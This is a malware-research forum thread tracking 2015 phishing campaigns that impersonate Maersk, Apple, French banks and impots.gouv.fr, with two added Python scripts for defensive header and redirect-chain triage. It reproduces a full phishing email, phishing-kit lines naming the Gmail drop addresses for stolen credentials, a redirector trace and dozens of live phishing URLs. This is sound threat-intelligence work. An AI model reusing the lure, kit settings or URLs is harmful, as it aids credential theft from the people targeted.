A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #25004  by Pr0xymu5
 Mon Jan 19, 2015 9:34 pm
PayPal and Apple are the most popular websites targeted by phishing.

I can see that, statistically, the average time to block a phishing website is between 1-4 days. This is too long....
 #26579  by Xylitol
 Sat Aug 22, 2015 7:16 pm
Maersk Line spam.
[screenshot]
Code:
x-store-info:4r51+eLowCe79NzwdU2kR3P+ctWZsO+J
Authentication-Results: hotmail.com; spf=none (sender IP is 180.149.240.133) smtp.mailfrom=dilip.margam@smlisuzu.com; dkim=none header.d=smlisuzu.com; x-hmca=none header.id=dilip.margam@smlisuzu.com
X-SID-PRA: dilip.margam@smlisuzu.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTmthuQbo0UropEGRhdfu+Wk/r50eaSaFPHqB6USKRgRGI/mNHCkQDPBNDC9LlyslRC3UYpbihQbbYS4hzcrWyUd6Vz5lO+c8PEMEIIrCTACA+bfM73k+oG69VJ6RMyWjYV0/crDxfe9jWjEUhzt+FGG//2uvN8oKGHUfMNo6VDQCK5rIjsoRhthRy4PJ7irpHzfYUp2LehjP6PBxmYg6gtnrI0/k5MILWiyLC0suvxN+w==
Received: from mithiskyconnect.com ([180.149.240.133]) by COL004-MC1F9.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.23143);
	 Thu, 20 Aug 2015 00:55:00 -0700
Received: from Internal Mail-Server by MS-ScanA (envelope-from
	dilip.margam@smlisuzu.com) with SMTP; 20 Aug 2015 13:15:13 +0530
Received: from mail7.mithiskyconnect.com (localhost.localdomain [127.0.0.1])
	by mail7.mithiskyconnect.com (SMF) with ESMTP id 6A2CDA00097 for
	<**********@live.fr>; Thu, 20 Aug 2015 13:15:37 +0530 (IST)
Received: from mail7.mithi.com (localhost.localdomain [127.0.0.1]) by
	mail7.mithiskyconnect.com (bulkSplit) with ESMTP id 5F8939E0038 for
	<**********@live.fr>; Thu, 20 Aug 2015 13:15:37 +0530 (IST)
Received: from 212.174.253.33 by Mail7 (envelope-from
	<dilip.margam@smlisuzu.com>, uid 0)  with qmail-scanner-1.25 (clamscan:
	0.60. Clear:RC:0(212.174.253.33) :. Processed in 0.174539 secs); Thu, 20 Aug
	2015 07:45:37 +0000
Received: from unknown (HELO WIN-S34SBKF5SVH.kolej.ankara) 
	(dilip.margam@smlisuzu.com@[212.174.253.33]) (envelope-sender
	<dilip.margam@smlisuzu.com>)  by 0 (qmail-ldap-1.03) with SMTP for
	<**********@live.fr>; Thu, 20 Aug 2015 07:45:37 +0000
Content-Type: multipart/alternative; boundary="===============1584738297=="
MIME-Version: 1.0
Subject: Bill Of Lading
To: **********@live.fr
From: "Customer Service" <dilip.margam@smlisuzu.com>
Date: Thu, 20 Aug 2015 00:45:34 -0700
X-Qmail-Scanner-Message-ID: <144005673768730062@Mail7>
Message-Id: <20150820074537.5F8939E0038@mail7.mithiskyconnect.com>
VadeRetro-Refid: SPAM, OK,
	(300)(1000)gggruggvucftvghtrhhoucdtuddrfeekfedrgeejgdduudehucetufdoteggodetrfcurfhrohhfihhlvgemucfrkffpgfetrffrnecuuegrihhlohhuthemuceftddtnecuogfrhhhishhhihhnghdqteefjeegqdduieculdeftddtmdenucfjughrpegtggfuvffhsegrtddtredttddunecuhfhrohhmpedfvehushhtohhmvghrucfuvghrvhhitggvfdcuoeguihhlihhprdhmrghrghgrmhesshhmlhhishhuiihurdgtohhmqeenucffohhmrghinheprghlihgsrggsrgdrtghomhdpfhhrihhtvghrihgvtghrohgtohguihhlvgdrtghomh
Spam-Score: 100.00
Return-Path: dilip.margam@smlisuzu.com
X-OriginalArrivalTime: 20 Aug 2015 07:55:01.0489 (UTC) FILETIME=[845BD610:01D0DB1D]

You will not see this in a MIME-aware mail reader.
--===============1584738297==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =20
  Dear **********@live.fr,
  This is to notify you that you have a Shipment alert and Details  .
  For safety purpose  VIEW HERE  Bill of lading and invoice document to login your email on our secure Portal.
  Best Regards
 Customer Service
   =A9 2015 Maersk Line A/S. All rights reserved.
=20


 



--===============1584738297==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html>

<head>
<meta http-equiv=3D=22Content-Language=22 content=3D=22en-us=22>
<meta http-equiv=3D=22Content-Type=22 content=3D=22text/html; charset=3Diso=
-8859-1=22>
<title>New Page 2</title>
</head>

<body>

<p style=3D=22color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-siz=
e: medium; font-style: normal; font-variant: normal; font-weight: normal; l=
etter-spacing: normal; line-height: normal; orphans: auto; text-align: star=
t; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; =
word-spacing: 0px; -webkit-text-stroke-width: 0px;=22>
<img src=3D=22http://www.maerskline.com/=7E/media/maersk-line/brand-assets/=
MaerskLine-logo.png=22 height=3D=2236=22 width=3D=22162=22></p>
<p style=3D=22color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-siz=
e: medium; font-style: normal; font-variant: normal; font-weight: normal; l=
etter-spacing: normal; line-height: normal; orphans: auto; text-align: star=
t; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; =
word-spacing: 0px; -webkit-text-stroke-width: 0px;=22>
Dear phoenixbytes=40live.fr,</p>
<p style=3D=22color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-siz=
e: medium; font-style: normal; font-variant: normal; font-weight: normal; l=
etter-spacing: normal; line-height: normal; orphans: auto; text-align: star=
t; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; =
word-spacing: 0px; -webkit-text-stroke-width: 0px;=22>
This is to notify you that you have a Shipment alert and Details&nbsp; .</p=
>
<p style=3D=22color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-siz=
e: medium; font-style: normal; font-variant: normal; font-weight: normal; l=
etter-spacing: normal; line-height: normal; orphans: auto; text-align: star=
t; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; =
word-spacing: 0px; -webkit-text-stroke-width: 0px;=22>&nbsp;For
<span style=3D=22color: =23000000=22><span class=3D=22Apple-converted-space=
=22>safety purpose
</span><a href=3D=22http://friteriecrocodile.com/awstats/maerskline/SHIPPIN=
GDOCUMENT.htm=22>
VIEW HERE </a></span><span class=3D=22Apple-converted-space=22>&nbsp;Bill o=
f lading and=20
invoice document </span>to login your email on our secure Portal.</p>
<p style=3D=22color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-siz=
e: medium; font-style: normal; font-variant: normal; font-weight: normal; l=
etter-spacing: normal; line-height: normal; orphans: auto; text-align: star=
t; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; =
word-spacing: 0px; -webkit-text-stroke-width: 0px;=22>
Best Regards<br>
Customer Service</p>
<p style=3D=22color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-sty=
le: normal; font-variant: normal; font-weight: normal; letter-spacing: norm=
al; line-height: normal; orphans: auto; text-align: start; text-indent: 0px=
; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; =
-webkit-text-stroke-width: 0px=22>
<a data-spm-anchor-id=3D=22a2700.7224109.a271py.79=22 rel=3D=22nofollow=22 =
href=3D=22http://www.alibaba.com/trade/servlet/page/static/copyright_policy=
=22>
<span style=3D=22text-decoration: none;=22><font color=3D=22=23808080=22 si=
ze=3D=222=22>=A9</font></span></a><font=20color=3D=22=23808080=22=20size=3D=
=222=22><span=20class=3D=22Apple-converted-space=22>&nbsp;</span>2015=20=0A=
Maersk=20Line=20A/S.=20All=20rights=20reserved.</font></p>=0A=0A<br><br>=0D=
=0A=20<br>=0D=0A</body>=0A=0A</html>=0A<br>


--===============1584738297==--
Code:
$recipient = "madnesstune@gmail.com";
Attachment: infected (396.14 KiB)
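The header dump above, and the two impots.gouv.fr dumps posted later in this thread, can be triaged the same way: read the receiver's Authentication-Results, compare the visible From: domain with the envelope sender, and walk the Received: chain back to the earliest hop. The following is an added example, not code from the post or from any of the kits shown; it uses Python's standard `email` module and embeds trimmed copies of the two header blocks from this thread as its input. The `aligned()` suffix check is a simplification of DMARC's organisational-domain rule, which a real implementation would do with the Public Suffix List.

```python
"""Triage of a pasted SMTP header dump.

Added example, not code from the forum post: reads a raw header block, pulls
the receiver's Authentication-Results verdicts, checks DMARC-style alignment of
the visible From: domain with the envelope sender (Return-Path / smtp.mailfrom)
and walks the Received: chain to the earliest hop that names a client IP.
"""
import email
import email.utils
import re

# Header blocks trimmed from the two dumps posted in this thread (the Maersk
# Line lure and the impots.gouv.fr lure). Recipients were already masked.
MAERSK_HEADERS = """\
Authentication-Results: hotmail.com; spf=none (sender IP is 180.149.240.133) smtp.mailfrom=dilip.margam@smlisuzu.com; dkim=none header.d=smlisuzu.com; x-hmca=none header.id=dilip.margam@smlisuzu.com
Received: from mithiskyconnect.com ([180.149.240.133]) by COL004-MC1F9.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.23143);
\t Thu, 20 Aug 2015 00:55:00 -0700
Received: from mail7.mithiskyconnect.com (localhost.localdomain [127.0.0.1])
\tby mail7.mithiskyconnect.com (SMF) with ESMTP id 6A2CDA00097 for
\t<**********@live.fr>; Thu, 20 Aug 2015 13:15:37 +0530 (IST)
Received: from unknown (HELO WIN-S34SBKF5SVH.kolej.ankara)
\t(dilip.margam@smlisuzu.com@[212.174.253.33]) (envelope-sender
\t<dilip.margam@smlisuzu.com>)  by 0 (qmail-ldap-1.03) with SMTP for
\t<**********@live.fr>; Thu, 20 Aug 2015 07:45:37 +0000
From: "Customer Service" <dilip.margam@smlisuzu.com>
Return-Path: dilip.margam@smlisuzu.com
"""

IMPOTS_HEADERS = """\
Authentication-Results: hotmail.com; spf=none (sender IP is 222.165.135.195) smtp.mailfrom=www-data@rosa.wpc.gov.lk; dkim=none header.d=dgfip.finances.gouv.fr; x-hmca=none header.id=impots.gouv@dgfip.finances.gouv.fr
Received: from localhost ([222.165.135.195]) by BAY004-MC2F31.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.23143);
\t Thu, 27 Aug 2015 21:40:05 -0700
Received: by localhost (Postfix, from userid 33)
\tid 30B471F712C; Fri, 28 Aug 2015 06:44:30 +0530 (IST)
From: "Impots.gouv.fr" <impots.gouv@dgfip.finances.gouv.fr>
X-Mailer: PHPMailer (phpmailer.sourceforge.net) [version ]
Return-Path: www-data@rosa.wpc.gov.lk
"""

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)")
MAILFROM_RE = re.compile(r"smtp\.mailfrom=([^;\s]+)")
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
HELO_RE = re.compile(r"\(HELO\s+([^\s)]+)\)", re.IGNORECASE)


def _unfold(value):
    """Join RFC 5322 folded continuation lines into one line."""
    return re.sub(r"\r?\n[ \t]+", " ", value or "").strip()


def _domain(addr):
    """Lower-cased domain part of a mailbox such as '"Name" <user@host>'."""
    _, address = email.utils.parseaddr(addr)
    return address.rpartition("@")[2].lower()


def aligned(dom_a, dom_b):
    """Relaxed DMARC-style alignment: equal, or one is a subdomain of the other.
    Simplification: a real check derives the organisational domain from the
    Public Suffix List instead of plain suffix matching."""
    if not dom_a or not dom_b:
        return False
    return dom_a == dom_b or dom_a.endswith("." + dom_b) or dom_b.endswith("." + dom_a)


def parse_received(received_values):
    """Order Received: headers earliest first (each hop prepends its own) and
    pull out the client IP and HELO name where a hop recorded one."""
    hops = []
    for raw in reversed(received_values):
        line = _unfold(raw)
        ips = [ip for ip in IP_RE.findall(line) if not ip.startswith("127.")]
        helo = HELO_RE.search(line)
        hops.append({"ip": ips[0] if ips else None,
                     "helo": helo.group(1) if helo else None})
    return hops


def triage(raw_headers):
    """Verdicts, alignment, origin hop and human-readable findings for one mail."""
    msg = email.message_from_string(raw_headers)
    auth = _unfold(msg.get("Authentication-Results", ""))
    verdicts = dict(AUTH_RE.findall(auth))
    mailfrom = MAILFROM_RE.search(auth)
    from_domain = _domain(_unfold(msg.get("From", "")))
    envelope_domain = (_domain(_unfold(msg.get("Return-Path", "")))
                       or (_domain(mailfrom.group(1)) if mailfrom else ""))
    hops = parse_received(msg.get_all("Received") or [])
    # Local submission ('by localhost (Postfix, from userid 33)') records no
    # client IP, so the first hop that has one is the submitting host itself.
    origin = next((h for h in hops if h["ip"]), None)
    is_aligned = aligned(from_domain, envelope_domain)
    findings = [f"{m}={verdicts.get(m, 'absent')}: sender not authenticated"
                for m in ("spf", "dkim") if verdicts.get(m) != "pass"]
    if not is_aligned:
        findings.append(f"From: {from_domain} does not align with envelope sender {envelope_domain}")
    if "phpmailer" in _unfold(msg.get("X-Mailer", "")).lower():
        findings.append("X-Mailer is PHPMailer: sent by a web script, not a mail client or MTA")
    return {"verdicts": verdicts, "from_domain": from_domain, "envelope_domain": envelope_domain,
            "aligned": is_aligned, "hops": hops, "origin": origin, "findings": findings}


if __name__ == "__main__":
    for name, headers in (("Maersk", MAERSK_HEADERS), ("impots.gouv.fr", IMPOTS_HEADERS)):
        report = triage(headers)
        print(f"[{name}] origin={report['origin']}")
        for finding in report["findings"]:
            print("  -", finding)
```

Run as a script it prints the findings for both dumps. On the Maersk mail the From and envelope domains agree (smlisuzu.com) but SPF and DKIM are both `none`, and the earliest hop is a host HELOing as WIN-S34SBKF5SVH.kolej.ankara from 212.174.253.33. On the impots.gouv.fr mail the From domain dgfip.finances.gouv.fr does not align with the envelope sender rosa.wpc.gov.lk, and the earliest Received: shows local submission through Postfix by uid 33, which matches the PHPMailer X-Mailer and the www-data Return-Path.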
 #26597  by Xylitol
 Mon Aug 24, 2015 4:00 pm
Apple (Deutschland)
fochappele.com/authm/
[screenshot]
Code:
$SEND="acaysoah@gmail.com"; // YORUR EMAIL                     
Crédit Agricole/Free (France)
Redirector:
Code:
hxxp://rtolat.com/kar<email-victim>

---

--21:47:58--  http://rtolat.com/kar
           => `kar'
Connecting to rtolat.com:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://leguidefr.com/frex [following]
--21:47:59--  http://leguidefr.com/frex
           => `frex'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://leguidefr.com/frex/ [following]
--21:47:59--  http://leguidefr.com/frex/
           => `index.html'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: login [following]
--21:47:59--  http://leguidefr.com/frex/login
           => `login'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://leguidefr.com/frex/login/ [following]
--21:47:59--  http://leguidefr.com/frex/login/
           => `index.html'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: 1ce3fb25c96b23343cd11444c97becb5 [following]
--21:47:59--  http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5
           => `1ce3fb25c96b23343cd11444c97becb5'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/ [following]
--21:47:59--  http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/
           => `index.html'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: subscribe [following]
--21:48:00--  http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/subscribe
           => `subscribe'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/subscribe/ [following]
--21:48:00--  http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/subscribe/
           => `index.html'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 200 OK
leguidefr.com/ma/ma/
http://urlquery.net/screenshot.php?id=1440430832803
http://urlquery.net/screenshot.php?id=1440430757366
[screenshot]
Code:
$mail_to = "gwicvv@gmail.com,jaspercullen2014@gmail.com";
Free:
Code:
$send = "rezq.fanniche@gmail.com"; 
http://urlquery.net/screenshot.php?id=1440433212653
[screenshots]
The small mention (BlackHat) takes on its full meaning.
Attachments: infected (97.65 KiB), infected (1.93 MiB), infected (1.12 MiB)
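The wget transcript in the Crédit Agricole/Free post above shows the typical redirector pattern: an entry domain answering 302, then a chain of 301/302 hops on the landing host, several of them with a relative `Location:` (login, subscribe, a 32-hex token) that wget resolves against the URL it just fetched. As an added example that is not part of Xylitol's post, the script below parses that transcript, resolves each `Location:` the way wget does, verifies that every resolved target is the next URL fetched, and summarises the hosts and the hashed path token a blocklist or detection rule would key on. The same kind of 32-hex path segment appears throughout the impots.gouv.fr URL list in the following post.

```python
"""Summarise a phishing redirector chain from a wget transcript.

Added example, not code from the forum post: parses the wget output pasted in
the thread, resolves every Location: value against the URL it was returned for
(as wget itself does, which is why 'Location: login' becomes .../frex/login),
checks that each resolved target is the next URL wget fetched, and summarises
the hosts and the 32-hex path token a blocklist or detection rule would key on.
"""
import re
from urllib.parse import urljoin, urlparse

# The transcript from the post, with wget's "=> `file'" and "Connecting to"
# lines dropped; URLs, status lines and Location: values are unchanged.
WGET_LOG = """\
--21:47:58--  http://rtolat.com/kar
HTTP request sent, awaiting response... 302 Found
Location: http://leguidefr.com/frex [following]
--21:47:59--  http://leguidefr.com/frex
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://leguidefr.com/frex/ [following]
--21:47:59--  http://leguidefr.com/frex/
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: login [following]
--21:47:59--  http://leguidefr.com/frex/login
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://leguidefr.com/frex/login/ [following]
--21:47:59--  http://leguidefr.com/frex/login/
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: 1ce3fb25c96b23343cd11444c97becb5 [following]
--21:47:59--  http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/ [following]
--21:47:59--  http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: subscribe [following]
--21:48:00--  http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/subscribe
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/subscribe/ [following]
--21:48:00--  http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/subscribe/
HTTP request sent, awaiting response... 200 OK
"""

HOP_RE = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")
STATUS_RE = re.compile(r"awaiting response\.\.\. (\d{3})")
LOCATION_RE = re.compile(r"^Location:\s+(\S+)")
MD5_RE = re.compile(r"[0-9a-f]{32}")


def parse_wget_chain(log):
    """One dict per fetched URL: url, HTTP status and the resolved Location."""
    hops, current = [], None
    for line in log.splitlines():
        if m := HOP_RE.match(line):
            current = {"url": m.group(1), "status": None, "location": None}
            hops.append(current)
        elif current and (m := STATUS_RE.search(line)):
            current["status"] = int(m.group(1))
        elif current and (m := LOCATION_RE.match(line)):
            # Relative Location values are resolved against the current URL.
            current["location"] = urljoin(current["url"], m.group(1))
    return hops


def chain_consistent(hops):
    """True when every redirect target is exactly the next URL that was fetched."""
    return all(h["location"] == n["url"] for h, n in zip(hops, hops[1:]))


def summarise(hops):
    """Entry point, landing page, redirect count, hosts and hashed path tokens."""
    segments = {seg for h in hops for seg in urlparse(h["url"]).path.split("/")}
    return {
        "entry": hops[0]["url"],
        "landing": hops[-1]["url"],
        "redirects": sum(1 for h in hops if h["status"] and 300 <= h["status"] < 400),
        "hosts": sorted({urlparse(h["url"]).hostname for h in hops}),
        "tokens": sorted(s for s in segments if MD5_RE.fullmatch(s)),
    }


if __name__ == "__main__":
    chain = parse_wget_chain(WGET_LOG)
    for hop in chain:
        print(hop["status"], hop["url"], "->", hop["location"] or "(final)")
    print("consistent:", chain_consistent(chain))
    print(summarise(chain))
```

For this transcript the parser finds nine fetches, eight of them redirects, two hosts (rtolat.com as the entry redirector, leguidefr.com as the landing host) and one 32-hex token in the path. The consistency check matters when a transcript is pasted from a different client: if a relative `Location:` had been resolved against the wrong base, the chain would break at that hop and the check would return False.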
 #26619  by Xylitol
 Sun Aug 30, 2015 10:57 am
Quick follow-up on an 'impots.gouv.fr' phishing campaign.
[screenshots]
Malicious/hijacked domains collected so far:
Code:
http://5gdhtecza.zhr.pl/wp-content/uploads/web/account/redirection.php
http://acadtransportes.com.br/wp-content/plugins/-/index/index/6c8c17253b76a5bbf24075433026546d/d2f5c0aa5d2360c3709712829a4a81f4/redirection.php
http://acadtransportes.com.br/wp-includes/js/-/index/index/c79849d92bb35961d8fdce29a5bd6edc/58b66a520120f64e8b6e0528eb44f102/redirection.php
http://acadtransportes.com.br/wp-includes/js/-/index/index/c79849d92bb35961d8fdce29a5bd6edc/6a45ba1bdbf714477d972edfe5097b66/redirection.php
http://atelier-fenix.pl/fenix/javacss/mporeturn/redirection.php
http://cbs.irkutsk.ru/old/hron2009/images/mporeturn/redirection.php
http://closetdesign.com.sg/tmp/verification-compte-impots.gouv.fr/pots/file/9880236b31aaf6ae42b242572150e758/redirection.php
http://comptoneye.com/myopia/.idea/scopes/index/index/f46fe45753f81c452cd353ace0a26fcb/357e7ecf3118bc1f7a3bab80b642cccb/redirection.php
http://ddancefactory.com/wp-content/themes/twentyfourteen/images/homey/homey/homey/homey/homey/homey/redirection.php
http://dentalcaresrilanka.com/wp-admin/js/impots-verification-information-fr/pots/file/1ef1a9cf2d5f02436c7e2bcbfe1c1bf7/redirection.php
http://emscaribbean.com/wp-content/themes/ems/inc/1/homey/homey/redirection.php
http://fonac.org.br/ddd/cps/rbrsdeptement/redirection.php
http://fonac.org.br/phputf9/checkingtaxe/redirection.php
http://fonac.org.br/phputf9/publicfinance/redirection.php
http://fonac.org.br/ppchecker/directionmpo/redirection.php
http://fonac.org.br/tgfls/checkingtaxe/redirection.php
http://fonac.org.br/tgfls/rbrsdeptement/redirection.php
http://gartenmoebelgigant.de/skin/frontend/default/garmoe-2013/images/france/impots.gouv.fr/faec799acb4273152a1e892e564188c9/redirection.php
http://glamorgandrivingschool.co.uk/impots.rembouresement/id/6737f37158e60c29f5151b32384e230f/redirection.php
http://godshandmin.org/home/Client-informations/confirmer-statut/impots/imp/a0e8c60bb0ed41291e0947709cfd5c1d/redirection.php
http://gzump.com/rdr/impots.gouv.fr/297c032181f4dcc3064581f8fb7435ae/redirection.php
http://hghsuppliers.com/blog/img/apps/homey/redirection.php
http://host210.200-43-196.telecom.net.ar/sctip/libraries/fr/impots-gouv.fr/file/31787c013d91bc99c32a8c707e6a1c3a/redirection.php
http://impots-gouv-fr.ballerinafarmer.com/www.impots.gouv.fr/a546af8606eb6a7dc52f9cc7b01d9fc7/redirection.php
http://impots-gouv-fr.jimstile.com/www.impots.gouv.fr-1/136667654925713415e46544184c2664/redirection.php
http://impots-gouv-fr.jimstile.com/www.impots.gouv.fr-4/6b53f9ca294b5253b1e0e98b9aa30e54/redirection.php
http://impots-gouv.fr.zianigroup.com/www.impots.gouv.fr-3/35a65270c1765dfb6d181b48995c3b9b/redirection.php
http://impots-gouv.fr.zianigroup.com/www.impots.gouv.fr-4/8ef142c8cccd5af3af7813949c45dc3f/redirection.php
http://impots.gouv.fr.latexindia.in/www.impots.gouv.fr/file/64d916e66d670ca0de5599480723494b/redirection.php
http://impots.gouv.fr.marianaes.in/www.impots.gouv.fr/file/4e0ada84d6962a3728dfb8de44d41202/redirection.php
http://impots.gov.france.service-maintenance-informatique.org/www.impots.gouv.fr-1/12f5a1e14b5bff8dc15755a485a49585/redirection.php
http://impots.gov.france.service-maintenance-informatique.org/www.impots.gouv.fr-2/5763ae9029a14e8422da1b2e99f24300/redirection.php
http://impots.gov.france.service-maintenance-informatique.org/www.impots.gouv.fr-3/1694c6e64ac7020d46a4879ab15a3db2/redirection.php
http://impots.gov.france.service-maintenance-informatique.org/www.impots.gouv.fr-3/d625d63587d3d82b74bf9acaa76a1f86/redirection.php
http://impots.gov.france.service-maintenance-informatique.org/www.impots.gouv.fr-4/fd0bed0d69cbd944b82f7810bda87c37/redirection.php
http://impots.gov.service-maintenance-informatique.org/www.impots.gouv.fr-1/83a6c8cf0511ab15d4064bfc29d7eba2/redirection.php
http://impots.gov.service-maintenance-informatique.org/www.impots.gouv.fr-2/ae1945cc18582cc25951220268c793eb/redirection.php
http://impots.gov.service-maintenance-informatique.org/www.impots.gouv.fr-2/cf8fd9b832291b9f51aa044df8a934de/redirection.php
http://impots.gov.service-maintenance-informatique.org/www.impots.gouv.fr-3/c1ff77ce7ce0b9db2ed16fe13313c67d/redirection.php
http://impots.gov.service-maintenance-informatique.org/www.impots.gouv.fr-4/9ab4a381dddaf94d414f14c814ee6419/redirection.php
http://komidi.re/wp-content/plugins/impots.gouv.fr/405c547bdaf082c727fb5eae5f03fb19/redirection.php
http://komidi.re/wp-content/plugins/intense/impots.gouv.fr/0a2bab9355243563a7e3037b9de453fe/redirection.php
http://lafourno.com/images/stories/impots.gouv.fr/file/imp-ghx333/redirection.php
http://milenshop.vinaglobe.vn/Notification/impots.gouv.fr/file/3e2cf538783a06d456451333ffb1dec7/redirection.php
http://milenshop.vinaglobe.vn/Notification/impots.gouv.fr/file/41114d58b2087731b00c39dc4ae4f92a/redirection.php
http://milenshop.vinaglobe.vn/Notification/impots.gouv.fr/file/60a7bbc1c1415e3cc6e230e939585097/redirection.php
http://milenshop.vinaglobe.vn/Notification/impots.gouv.fr/file/7343e67a941284abfaa5427945fd4d51/redirection.php
http://milenshop.vinaglobe.vn/Notification/impots.gouv.fr/file/d2e004f0c2be6be75a6cac60d4e6616a/redirection.php
http://petraproperty.co.id/Notification/impots.gouv.fr/file/47fc7040cfc4c972d3d2ff8df0922882/redirection.php
http://phillipspinturaydecoracion.es/wp-content/themes/twentyeleven/imp/a7a91f03c4c73e34b05e05911eca9d38/redirection.php
http://positivecommerce.com/baseinstall/cache/modvirtu/a1/homey/homey/redirection.php
http://positivecommerce.com/baseinstall/cache/modvirtu/a2/homey/homey/redirection.php
http://positivecommerce.com/baseinstall/cache/modvirtu/a3/homey/homey/redirection.php
http://positivecommerce.com/baseinstall/cache/modvirtu/a4/homey/homey/redirection.php
http://positivecommerce.com/baseinstall/cache/modvirtu/a5/homey/homey/redirection.php
http://positivecommerce.com/baseinstall/cache/modvirtu/a6/homey/homey/redirection.php
http://positivecommerce.com/baseinstall/images/banners/2/homey/homey/redirection.php
http://positivecommerce.com/j15temptest/packageip/endo/checkingtaxe/redirection.php
http://positivecommerce.com/mambots/editors-xtd/osimaalpha/checkingtaxe/redirection.php
http://positivecommerce.com/mambots/editors-xtd/osimaalpha/directionmpo/redirection.php
http://recouvrement-f-secure-accountimpot-gouv.com/service-impot.gouvfrance.fr/redirection.php
http://recouvrement-info-accountapplstore.com/info-impot.gouvfrance.fr/redirection.php
http://secure34.prodns.com.br/~lacdecor/compte-verification-impots-fr/pots/file/ac121559b5bafb077eb14cbaff896e61/redirection.php
http://semcoteakproducts.ca/js/LoginAccess3/impots.gouv.fr/69809339581410a9f9dfaad27e5015a5/redirection.php
http://semcoteakproducts.ca/js/LoginAccess3/impots.gouv.fr/d689f5d1d7cb65ed7170b8e71b4acd2b/redirection.php
http://srv34.prodns.com.br/~lacdecor/compte-verification-impots-fr/pots/file/ac121559b5bafb077eb14cbaff896e61/redirection.php
http://sweetlifestevia.ca/wp-includes/images/smilies/Impots.gouv2015/redirection.php
http://tannaris.si/tmp/impots.rembouresement.fr/id/08720a62f8b9637c6577367c6cfd371f/redirection.php
http://thefashionlist.com/program/identiti/impots.gouv.fr/file/098e8eebbd7af7f6ef59e36e53aabe83/redirection.php
http://theshophd.com/sites/all/libraries/jplayer/imp-ghx333/redirection.php
http://thisishealthful.com/impots.rembouresement.fr/id/40dade3bc0a44959493b60d09a7ee42c/redirection.php
http://thisishealthful.com/impots.rembouresement.fr/id/8e64e36576ae18ffb76b0e0f16b98840/redirection.php
http://vikastabla.com/home/logs/impots/d2e43df6f856e8eb9208c1d941bab0e8/redirection.php
http://ville-gueret.fr/statsb/impots.gouv.fr/480a7728f8a38358abb834883dd52ab9/redirection.php
http://www.brume.ca/impots.rembouresement.fr/id/15cac4f084d582b47cd305629e559375/redirection.php
http://www.brume.ca/impots.rembouresement.fr/id/c881b6f53ad65ab935468a99ada58b7d/redirection.php
http://www.chestnutstoreys.com/wp-admin/impots/info/fr_FR/impots/gouv/remboursement/fr/imp-ghx333/redirection.php
http://www.fima.kz/components/com_contact/views/contact/tmpl/css/index/index/6734d6bb61faf2e7cdccbbb197462bcf/1e07655caf5920ca0321d9cc06dcb5dd/redirection.php
http://www.isayorganic.com/impt/a129846e14bc0ee554bd6b7f8d2327cf/redirection.php
http://www.komidi.re/wp-content/plugins/intense/impots.gouv.fr/aef0823ed9596ca5a7e27ba70534e696/redirection.php
http://www.komidi.re/wp-content/plugins/intense/impots.gouv.fr/bf41f4083bb9bcbafbae463beead36f7/redirection.php
http://www.komidi.re/wp-content/plugins/intense/impots.gouv.fr/f4826b54795aadb57a91edae9f344948/redirection.php
http://www.mejujuy.gov.ar/sctip/libraries/fr/impots-gouv.fr/file/31787c013d91bc99c32a8c707e6a1c3a/redirection.php
